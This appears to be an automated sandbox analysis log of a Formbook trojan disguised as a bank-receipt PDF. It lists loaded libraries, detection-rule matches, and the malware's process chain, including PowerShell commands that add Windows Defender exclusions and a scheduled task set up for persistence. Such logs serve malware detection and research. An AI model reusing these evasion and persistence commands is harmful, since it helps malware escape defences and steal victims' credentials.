Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: msasn1.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: amsi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: userenv.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: profapi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: gpapi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: msisip.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: wshext.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: appxsip.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: opcservices.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: secur32.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: uxtheme.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: urlmon.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: iertutil.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: srvcli.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: netutils.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: propsys.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: wininet.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: atl.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: mscoree.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: version.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptsp.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: rsaenh.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptbase.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: wldp.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: windows.storage.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: amsi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: msasn1.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: userenv.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: profapi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: msisip.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: wshext.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: appxsip.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: opcservices.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: gpapi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: secur32.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: uxtheme.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: urlmon.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: iertutil.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: srvcli.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: netutils.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: propsys.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: wininet.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: microsoft.management.infrastructure.native.unmanaged.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: mi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: miutils.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: wmidcom.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: dpapi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: wbemcomn.dll
Source: C:\Windows\SysWOW64\schtasks.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\schtasks.exe Section loaded: taskschd.dll
Source: C:\Windows\SysWOW64\schtasks.exe Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Roaming\OkLsTLaTTZVp.exe Section loaded: mscoree.dll
Source: C:\Users\user\AppData\Roaming\OkLsTLaTTZVp.exe Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Roaming\OkLsTLaTTZVp.exe Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Roaming\OkLsTLaTTZVp.exe Section loaded: version.dll
Source: C:\Users\user\AppData\Roaming\OkLsTLaTTZVp.exe Section loaded: vcruntime140_clr0400.dll
Source: C:\Users\user\AppData\Roaming\OkLsTLaTTZVp.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Roaming\OkLsTLaTTZVp.exe Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Roaming\OkLsTLaTTZVp.exe Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Roaming\OkLsTLaTTZVp.exe Section loaded: wldp.dll
Source: C:\Users\user\AppData\Roaming\OkLsTLaTTZVp.exe Section loaded: profapi.dll
Source: C:\Users\user\AppData\Roaming\OkLsTLaTTZVp.exe Section loaded: cryptsp.dll
Source: C:\Users\user\AppData\Roaming\OkLsTLaTTZVp.exe Section loaded: rsaenh.dll
Source: C:\Users\user\AppData\Roaming\OkLsTLaTTZVp.exe Section loaded: cryptbase.dll
Source: C:\Users\user\AppData\Roaming\OkLsTLaTTZVp.exe Section loaded: dwrite.dll
Source: C:\Users\user\AppData\Roaming\OkLsTLaTTZVp.exe Section loaded: amsi.dll
Source: C:\Users\user\AppData\Roaming\OkLsTLaTTZVp.exe Section loaded: userenv.dll
Source: C:\Users\user\AppData\Roaming\OkLsTLaTTZVp.exe Section loaded: msasn1.dll
Source: C:\Users\user\AppData\Roaming\OkLsTLaTTZVp.exe Section loaded: gpapi.dll
Source: C:\Users\user\AppData\Roaming\OkLsTLaTTZVp.exe Section loaded: windowscodecs.dll
Source: C:\Users\user\AppData\Roaming\OkLsTLaTTZVp.exe Section loaded: ntmarta.dll
Source: C:\Users\user\AppData\Roaming\OkLsTLaTTZVp.exe Section loaded: propsys.dll
Source: C:\Users\user\AppData\Roaming\OkLsTLaTTZVp.exe Section loaded: edputil.dll
Source: C:\Users\user\AppData\Roaming\OkLsTLaTTZVp.exe Section loaded: urlmon.dll
Source: C:\Users\user\AppData\Roaming\OkLsTLaTTZVp.exe Section loaded: iertutil.dll
Source: C:\Users\user\AppData\Roaming\OkLsTLaTTZVp.exe Section loaded: srvcli.dll
Source: C:\Users\user\AppData\Roaming\OkLsTLaTTZVp.exe Section loaded: netutils.dll
Source: C:\Users\user\AppData\Roaming\OkLsTLaTTZVp.exe Section loaded: windows.staterepositoryps.dll
Source: C:\Users\user\AppData\Roaming\OkLsTLaTTZVp.exe Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Roaming\OkLsTLaTTZVp.exe Section loaded: wintypes.dll
Source: C:\Users\user\AppData\Roaming\OkLsTLaTTZVp.exe Section loaded: appresolver.dll
Source: C:\Users\user\AppData\Roaming\OkLsTLaTTZVp.exe Section loaded: bcp47langs.dll
Source: C:\Users\user\AppData\Roaming\OkLsTLaTTZVp.exe Section loaded: slc.dll
Source: C:\Users\user\AppData\Roaming\OkLsTLaTTZVp.exe Section loaded: sppc.dll
Source: C:\Users\user\AppData\Roaming\OkLsTLaTTZVp.exe Section loaded: onecorecommonproxystub.dll
Source: C:\Users\user\AppData\Roaming\OkLsTLaTTZVp.exe Section loaded: onecoreuapcommonproxystub.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe Section loaded: fastprox.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe Section loaded: ncobjapi.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe Section loaded: wbemcomn.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe Section loaded: mpclient.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe Section loaded: userenv.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe Section loaded: version.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe Section loaded: msasn1.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe Section loaded: wmitomi.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe Section loaded: mi.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe Section loaded: miutils.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe Section loaded: gpapi.dll
Source: C:\Windows\SysWOW64\sc.exe Section loaded: wininet.dll
Source: C:\Windows\SysWOW64\sc.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\sc.exe Section loaded: uxtheme.dll
Source: C:\Windows\SysWOW64\sc.exe Section loaded: ieframe.dll
Source: C:\Windows\SysWOW64\sc.exe Section loaded: iertutil.dll
Source: C:\Windows\SysWOW64\sc.exe Section loaded: netapi32.dll
Source: C:\Windows\SysWOW64\sc.exe Section loaded: version.dll
Source: C:\Windows\SysWOW64\sc.exe Section loaded: userenv.dll
Source: C:\Windows\SysWOW64\sc.exe Section loaded: winhttp.dll
Source: C:\Windows\SysWOW64\sc.exe Section loaded: wkscli.dll
Source: C:\Windows\SysWOW64\sc.exe Section loaded: netutils.dll
Source: C:\Windows\SysWOW64\sc.exe Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\sc.exe Section loaded: windows.storage.dll
Source: C:\Windows\SysWOW64\sc.exe Section loaded: wldp.dll
Source: C:\Windows\SysWOW64\sc.exe Section loaded: profapi.dll
Source: C:\Windows\SysWOW64\sc.exe Section loaded: secur32.dll
Source: C:\Windows\SysWOW64\sc.exe Section loaded: mlang.dll
Source: C:\Windows\SysWOW64\sc.exe Section loaded: propsys.dll
Source: C:\Windows\SysWOW64\sc.exe Section loaded: winsqlite3.dll
Source: C:\Windows\SysWOW64\sc.exe Section loaded: vaultcli.dll
Source: C:\Windows\SysWOW64\sc.exe Section loaded: wintypes.dll
Source: C:\Windows\SysWOW64\sc.exe Section loaded: dpapi.dll
Source: C:\Windows\SysWOW64\sc.exe Section loaded: cryptbase.dll
Source: C:\Windows\SysWOW64\schtasks.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\schtasks.exe Section loaded: taskschd.dll
Source: C:\Windows\SysWOW64\schtasks.exe Section loaded: sspicli.dll
Source: C:\Program Files (x86)\lMrsFaZtIHxsydIteCamjNxAcldBeoDWTXWtXDtyOrcuniOBQzOlkosufHKzhKUlRkaqQ\IiPvZGpNYiTIbQIQLaPZIDOIY.exe Section loaded: wininet.dll
Source: C:\Program Files (x86)\lMrsFaZtIHxsydIteCamjNxAcldBeoDWTXWtXDtyOrcuniOBQzOlkosufHKzhKUlRkaqQ\IiPvZGpNYiTIbQIQLaPZIDOIY.exe Section loaded: mswsock.dll
Source: C:\Program Files (x86)\lMrsFaZtIHxsydIteCamjNxAcldBeoDWTXWtXDtyOrcuniOBQzOlkosufHKzhKUlRkaqQ\IiPvZGpNYiTIbQIQLaPZIDOIY.exe Section loaded: dnsapi.dll
Source: C:\Program Files (x86)\lMrsFaZtIHxsydIteCamjNxAcldBeoDWTXWtXDtyOrcuniOBQzOlkosufHKzhKUlRkaqQ\IiPvZGpNYiTIbQIQLaPZIDOIY.exe Section loaded: iphlpapi.dll
Source: C:\Program Files (x86)\lMrsFaZtIHxsydIteCamjNxAcldBeoDWTXWtXDtyOrcuniOBQzOlkosufHKzhKUlRkaqQ\IiPvZGpNYiTIbQIQLaPZIDOIY.exe Section loaded: fwpuclnt.dll
Source: C:\Program Files (x86)\lMrsFaZtIHxsydIteCamjNxAcldBeoDWTXWtXDtyOrcuniOBQzOlkosufHKzhKUlRkaqQ\IiPvZGpNYiTIbQIQLaPZIDOIY.exe Section loaded: rasadhlp.dll
Source: Axis Bank - 67 Account Pending Bank Receipt.pdf.exe Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: 10.2.Axis Bank - 67 Account Pending Bank Receipt.pdf.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 10.2.Axis Bank - 67 Account Pending Bank Receipt.pdf.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 0000000E.00000002.4510906943.0000000002B30000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000015.00000002.4523355689.0000000004AE0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 0000000A.00000002.2177190183.00000000018A0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000011.00000002.2296111167.0000000002030000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 0000000A.00000002.2178313752.00000000027A0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 0000000A.00000002.2176518453.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 0000000E.00000002.4521932134.0000000003330000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000013.00000002.2297091636.0000000000800000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 0000000E.00000002.4521296649.0000000003100000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 0000000D.00000002.4521828690.0000000002D20000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000012.00000002.4521230365.0000000003110000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: Axis Bank - 67 Account Pending Bank Receipt.pdf.exe Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: OkLsTLaTTZVp.exe.0.dr Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: 0.2.Axis Bank - 67 Account Pending Bank Receipt.pdf.exe.6a70000.8.raw.unpack, AJO8kvyDr8qxYWB5Qt.cs Cryptographic APIs: 'CreateDecryptor'
Source: 0.2.Axis Bank - 67 Account Pending Bank Receipt.pdf.exe.249674c.4.raw.unpack, AJO8kvyDr8qxYWB5Qt.cs Cryptographic APIs: 'CreateDecryptor'
Source: 11.2.OkLsTLaTTZVp.exe.2e766ac.2.raw.unpack, AJO8kvyDr8qxYWB5Qt.cs Cryptographic APIs: 'CreateDecryptor'
Source: 0.2.Axis Bank - 67 Account Pending Bank Receipt.pdf.exe.6e30000.10.raw.unpack, M6wynbsTFcTkCcoXC7.cs Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 0.2.Axis Bank - 67 Account Pending Bank Receipt.pdf.exe.38755b0.7.raw.unpack, M6wynbsTFcTkCcoXC7.cs Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 0.2.Axis Bank - 67 Account Pending Bank Receipt.pdf.exe.38755b0.7.raw.unpack, pZk8OOHpFXGPippkEB.cs Security API names: _0020.SetAccessControl
Source: 0.2.Axis Bank - 67 Account Pending Bank Receipt.pdf.exe.38755b0.7.raw.unpack, pZk8OOHpFXGPippkEB.cs Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 0.2.Axis Bank - 67 Account Pending Bank Receipt.pdf.exe.38755b0.7.raw.unpack, pZk8OOHpFXGPippkEB.cs Security API names: _0020.AddAccessRule
Source: 0.2.Axis Bank - 67 Account Pending Bank Receipt.pdf.exe.6e30000.10.raw.unpack, pZk8OOHpFXGPippkEB.cs Security API names: _0020.SetAccessControl
Source: 0.2.Axis Bank - 67 Account Pending Bank Receipt.pdf.exe.6e30000.10.raw.unpack, pZk8OOHpFXGPippkEB.cs Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 0.2.Axis Bank - 67 Account Pending Bank Receipt.pdf.exe.6e30000.10.raw.unpack, pZk8OOHpFXGPippkEB.cs Security API names: _0020.AddAccessRule
Source: 11.2.OkLsTLaTTZVp.exe.2e9ae1c.0.raw.unpack, ReactionVessel.cs Suspicious method names: .ReactionVessel.Inject
Source: 11.2.OkLsTLaTTZVp.exe.2e92e04.6.raw.unpack, ReactionVessel.cs Suspicious method names: .ReactionVessel.Inject
Source: 0.2.Axis Bank - 67 Account Pending Bank Receipt.pdf.exe.6d00000.9.raw.unpack, ReactionVessel.cs Suspicious method names: .ReactionVessel.Inject
Source: 0.2.Axis Bank - 67 Account Pending Bank Receipt.pdf.exe.250515c.3.raw.unpack, ReactionVessel.cs Suspicious method names: .ReactionVessel.Inject
Source: 0.2.Axis Bank - 67 Account Pending Bank Receipt.pdf.exe.24baec8.1.raw.unpack, ReactionVessel.cs Suspicious method names: .ReactionVessel.Inject
Source: 0.2.Axis Bank - 67 Account Pending Bank Receipt.pdf.exe.24b2eb0.0.raw.unpack, ReactionVessel.cs Suspicious method names: .ReactionVessel.Inject
Source: 11.2.OkLsTLaTTZVp.exe.2ee4ea4.3.raw.unpack, ReactionVessel.cs Suspicious method names: .ReactionVessel.Inject
Source: classification engine Classification label: mal100.troj.spyw.evad.winEXE@27/16@15/12
Source: C:\Users\user\Desktop\Axis Bank - 67 Account Pending Bank Receipt.pdf.exe File created: C:\Users\user\AppData\Roaming\OkLsTLaTTZVp.exe
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5044:120:WilError_03
Source: C:\Users\user\AppData\Roaming\OkLsTLaTTZVp.exe Mutant created: NULL
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5076:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1948:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5532:120:WilError_03
Source: C:\Users\user\Desktop\Axis Bank - 67 Account Pending Bank Receipt.pdf.exe File created: C:\Users\user\AppData\Local\Temp\tmp566C.tmp
Source: Axis Bank - 67 Account Pending Bank Receipt.pdf.exe Static file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.80%
Source: C:\Users\user\Desktop\Axis Bank - 67 Account Pending Bank Receipt.pdf.exe File read: C:\Users\user\Desktop\desktop.ini
Source: C:\Users\user\Desktop\Axis Bank - 67 Account Pending Bank Receipt.pdf.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: sc.exe, 0000000E.00000003.2450651858.0000000002FC7000.00000004.00000020.00020000.00000000.sdmp, sc.exe, 0000000E.00000002.4513265527.0000000002FC7000.00000004.00000020.00020000.00000000.sdmp, sc.exe, 0000000E.00000003.2452481488.0000000002FD2000.00000004.00000020.00020000.00000000.sdmp, sc.exe, 0000000E.00000002.4513265527.0000000002FF5000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
Source: Axis Bank - 67 Account Pending Bank Receipt.pdf.exe Virustotal: Detection: 53%
Source: Axis Bank - 67 Account Pending Bank Receipt.pdf.exe ReversingLabs: Detection: 55%
Source: C:\Users\user\Desktop\Axis Bank - 67 Account Pending Bank Receipt.pdf.exe File read: C:\Users\user\Desktop\Axis Bank - 67 Account Pending Bank Receipt.pdf.exe
Source: unknown Process created: C:\Users\user\Desktop\Axis Bank - 67 Account Pending Bank Receipt.pdf.exe "C:\Users\user\Desktop\Axis Bank - 67 Account Pending Bank Receipt.pdf.exe"
Source: C:\Users\user\Desktop\Axis Bank - 67 Account Pending Bank Receipt.pdf.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Axis Bank - 67 Account Pending Bank Receipt.pdf.exe"
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\Axis Bank - 67 Account Pending Bank Receipt.pdf.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\OkLsTLaTTZVp.exe"
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\Axis Bank - 67 Account Pending Bank Receipt.pdf.exe Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\OkLsTLaTTZVp" /XML "C:\Users\user\AppData\Local\Temp\tmp566C.tmp"
Source: C:\Windows\SysWOW64\schtasks.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\Axis Bank - 67 Account Pending Bank Receipt.pdf.exe Process created: C:\Users\user\Desktop\Axis Bank - 67 Account Pending Bank Receipt.pdf.exe "C:\Users\user\Desktop\Axis Bank - 67 Account Pending Bank Receipt.pdf.exe"
Source: C:\Users\user\Desktop\Axis Bank - 67 Account Pending Bank Receipt.pdf.exe Process created: C:\Users\user\Desktop\Axis Bank - 67 Account Pending Bank Receipt.pdf.exe "C:\Users\user\Desktop\Axis Bank - 67 Account Pending Bank Receipt.pdf.exe"
Source: unknown Process created: C:\Users\user\AppData\Roaming\OkLsTLaTTZVp.exe C:\Users\user\AppData\Roaming\OkLsTLaTTZVp.exe
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\wbem\WmiPrvSE.exe C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
